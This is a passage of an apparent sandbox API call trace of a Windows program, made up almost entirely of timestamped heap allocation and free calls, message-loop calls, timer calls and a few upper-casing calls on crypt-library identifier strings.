dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0198.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0198.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0198.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0198.526] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0198.526] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0198.526] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0198.526] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0198.526] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0198.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0198.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0198.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0198.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0198.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0198.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0198.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129f020 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0198.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0198.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0198.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13b1020 [0198.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129f020 | out: hHeap=0x970000) returned 1 [0198.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0198.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0198.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0198.697] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.697] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0198.697] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0198.697] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0198.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0198.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0198.697] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0198.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0198.699] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0198.699] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0198.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0198.699] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0198.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0198.700] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0198.700] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0198.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1294020 [0198.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0198.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14c2020 [0198.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0198.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1294020 | out: hHeap=0x970000) returned 1 [0198.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0198.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0198.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0198.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129e020 [0198.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14c2020 | out: hHeap=0x970000) returned 1 [0198.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0198.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14c1020 [0199.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129e020 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0199.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 